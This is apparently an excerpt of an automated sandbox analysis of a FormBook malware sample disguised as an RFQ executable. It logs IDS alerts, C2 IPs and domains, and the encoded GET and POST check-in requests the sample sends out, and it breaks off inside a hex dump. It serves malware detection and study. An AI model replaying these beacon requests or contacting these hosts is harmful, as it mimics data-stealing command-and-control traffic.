            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49754 -> 107.163.130.249:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49772 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49774 -> 15.197.204.56:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49775 -> 15.197.204.56:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49782 -> 43.154.104.247:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49760 -> 52.223.13.41:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49785 -> 43.154.104.247:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.93187.xyz
            Source: DNS query: www.broomeorchard.xyz
            Source: DNS query: www.suarahati20.xyz
            Source: Joe Sandbox ViewIP Address: 199.192.21.169 199.192.21.169
            Source: Joe Sandbox ViewASN Name: LINKNET-ID-APLinknetASNID LINKNET-ID-APLinknetASNID
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox ViewASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
            Source: Joe Sandbox ViewASN Name: TAKE2US TAKE2US
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
            Source: global trafficHTTP traffic detected: GET /i7xp/?Vvn=XtJLE6KXyHJ010P&N0spilI0=1hYOXgym/+H9levHoL4uDmSoKaP5f04LAuBEPSFmNBWW1UoBGm7krMakoIf2T8PCbakGk5cJYsK9Iz90f+ByycC+m3CBgf9UgTY0pVgzUvtxB6m49SfQluc= HTTP/1.1Host: www.whats-in-the-box.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /8z5k/?N0spilI0=y1aGUeBTtCWB8PYk9+ZY5neg5WJlbc6kuJGyOOgv6AsofEnOPQxTGp57UW4jl24PiU2QUCC/WnCbrv11FxPlfmqzqWQ0oAXUsuE4toY6QlP7A8hrX6vWgTw=&Vvn=XtJLE6KXyHJ010P HTTP/1.1Host: www.1183377.appAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /4i87/?Vvn=XtJLE6KXyHJ010P&N0spilI0=tX1gPPm4vGDAfdGczrVeX+gm8LhLY0HdzqWbffI0WxOtalbv2UCR6RvwOqtQuPJgvEbTjd3YUbROaC6Ux6KVsboGl1wez7JIRLBvFWiGcrLzlWcfeTA45w8= HTTP/1.1Host: www.52ywq.vipAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /d8cw/?N0spilI0=ygF20N1+ik7kBOtGb3g4TwN9wkqIIRiR8XEst5j0lvkfFXMCnxh1w4hdkVa8euGiR7K2W9wNoXO2NDH8py5ookWv7InHpo4AkD1QDiauZEraAIYQUMRDKnI=&Vvn=XtJLE6KXyHJ010P HTTP/1.1Host: www.zenscape.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /jsqu/?Vvn=XtJLE6KXyHJ010P&N0spilI0=j6JGavFFAQYaoSsj7sdzjfOI2Rr+bAZS/zrFTn0tpA7YEGIVc6EsUszyewNJDeJ1aRTf+dmReaRifudBLpLuFGiuWviWU248lx4BGGAWHhQeP+58vPv3y+I= HTTP/1.1Host: www.asociacia.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /jyeu/?N0spilI0=KiLVsdjbhLGFnrJZtqTZThcLgxZgRsnLJ+iUpFrqUMB7t1Dgy4rxQKgK0ZJ2vypsgoxK5tfcGeo5lfiWWTY36SvGriSEhjCZh1puMp4IzR/yG5rFUDO3WkY=&Vvn=XtJLE6KXyHJ010P HTTP/1.1Host: www.93187.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /2fpq/?Vvn=XtJLE6KXyHJ010P&N0spilI0=Kb/tSpzo2Dwy8QCik2PCr8/dlP2bBJ+jv+ep1kI5jCwuscQQek2bWkoiPh5FTvH+ji2zFJaVeezPpoGajJ7KnUaOWGTJ/qpny8WUA+svitDcwEORStRuN1w= HTTP/1.1Host: www.insicilia.todayAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /abla/?N0spilI0=R9BPGtjeoV0CDxCGSnwEhbeCoNA2nZVdCqs+EeARQOkoA/Qwpt/BQ4HKq3lGg5eAXthSBpGiRyb49E6pfVOIK8HYayGHDu+DpDN+18WI9ctL3WRi2TK2Q5c=&Vvn=XtJLE6KXyHJ010P HTTP/1.1Host: www.tempatmudisini01.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /xweg/?Vvn=XtJLE6KXyHJ010P&N0spilI0=zyGgAOIUWHAkjy5wbuax0/FfUf3h0NwJaxZIhC+JlO6DnbZYVfn3Wlg6Cuq4vonK+0ubeBxTnsDOaX+bBTk8Y+Ai5wuik0xspH+a6MWSZLxuSkFH9/b6rws= HTTP/1.1Host: www.o731lh.vipAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /2ho9/?N0spilI0=sZDoihg8ajsFNu4rJh4aU/u18lT0jTMSxybOs53co7FoCsqulhCNIl7qmx9+CpDfKiL3BRrx3kpFS5y+tLS3C72rBIAnGZtnn+XzJEmDgEkU4cQofgEFxbM=&Vvn=XtJLE6KXyHJ010P HTTP/1.1Host: www.consultarfacil.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /8o1o/?N0spilI0=QunhVm6kZFQCJjGjii7PtVl4QBOBSEhunS34CwGNyhG42F+U2Qq2Bbej6HS9mh+MEeKFfLAj85iyVJ5CsJDjW/EB0lpOjo9F2+iOt7QfZRjcLyTCi7EuLmU=&Vvn=XtJLE6KXyHJ010P HTTP/1.1Host: www.broomeorchard.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /4est/?N0spilI0=6TioOITzTznuWaHFY2nP+M5OXgMojRQqdx+6cQbbG9CbTHyFxDml283eSUfpT4rPWLRehJ5KDSFFDUFbTukXgac9EFud27M13v05UDH3lX7bp5CeFPtRd9M=&Vvn=XtJLE6KXyHJ010P HTTP/1.1Host: www.suarahati20.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /8qne/?N0spilI0=KTDLAip6979182Yus4gak8cu0ouPK1SjRu9dlBr1KRF7u6Oe/Vup1PLCUBiG85sopIJcMB3IBfxfJF1E2Fdc2yH6m+FOGHStPZpUzCEofUPNgN9qGZfSYG8=&Vvn=XtJLE6KXyHJ010P HTTP/1.1Host: www.nmh6.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.whats-in-the-box.org
            Source: global trafficDNS traffic detected: DNS query: www.1183377.app
            Source: global trafficDNS traffic detected: DNS query: www.52ywq.vip
            Source: global trafficDNS traffic detected: DNS query: www.zenscape.top
            Source: global trafficDNS traffic detected: DNS query: www.asociacia.online
            Source: global trafficDNS traffic detected: DNS query: www.93187.xyz
            Source: global trafficDNS traffic detected: DNS query: www.insicilia.today
            Source: global trafficDNS traffic detected: DNS query: www.tempatmudisini01.click
            Source: global trafficDNS traffic detected: DNS query: www.o731lh.vip
            Source: global trafficDNS traffic detected: DNS query: www.consultarfacil.online
            Source: global trafficDNS traffic detected: DNS query: www.broomeorchard.xyz
            Source: global trafficDNS traffic detected: DNS query: www.suarahati20.xyz
            Source: global trafficDNS traffic detected: DNS query: www.nmh6.site
            Source: unknownHTTP traffic detected: POST /8z5k/ HTTP/1.1Host: www.1183377.appAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USAccept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeContent-Length: 205Origin: http://www.1183377.appReferer: http://www.1183377.app/8z5k/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36Data Raw: 4e 30 73 70 69 6c 49 30 3d 2f 33 79 6d 58 72 5a 75 73 51 2f 74 72 2b 34 33 68 4f 5a 54 39 46 6d 68 35 33 41 64 48 38 6d 51 6b 64 75 67 41 4e 49 5a 7a 58 52 62 4a 55 66 55 5a 46 6c 49 45 4b 64 32 61 43 38 68 6c 46 42 2f 76 53 65 57 63 78 32 30 58 44 43 36 6e 63 70 6e 45 78 61 65 5a 78 57 33 67 57 4a 71 6d 42 36 57 75 4f 78 73 72 36 55 55 56 30 37 6b 53 2b 56 68 64 5a 6e 47 31 43 6f 42 35 50 61 72 6f 79 78 48 46 4d 51 58 4e 41 2f 6a 62 5a 78 4b 43 39 72 6e 50 49 72 6a 37 6d 35 61 37 67 45 63 45 4f 68 75 37 4b 6e 43 50 4a 44 2f 65 7a 63 43 70 47 6f 68 32 39 31 6c 6a 67 66 64 6a 42 77 5a 49 37 58 6e 5a 67 3d 3d Data Ascii: N0spilI0=/3ymXrZusQ/tr+43hOZT9Fmh53AdH8mQkdugANIZzXRbJUfUZFlIEKd2aC8hlFB/vSeWcx20XDC6ncpnExaeZxW3gWJqmB6WuOxsr6UUV07kS+VhdZnG1CoB5ParoyxHFMQXNA/jbZxKC9rnPIrj7m5a7gEcEOhu7KnCPJD/ezcCpGoh291ljgfdjBwZI7XnZg==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 03:36:44 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 774X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 03:36:46 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 774X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 03:36:49 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 774X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 03:36:51 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 774X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 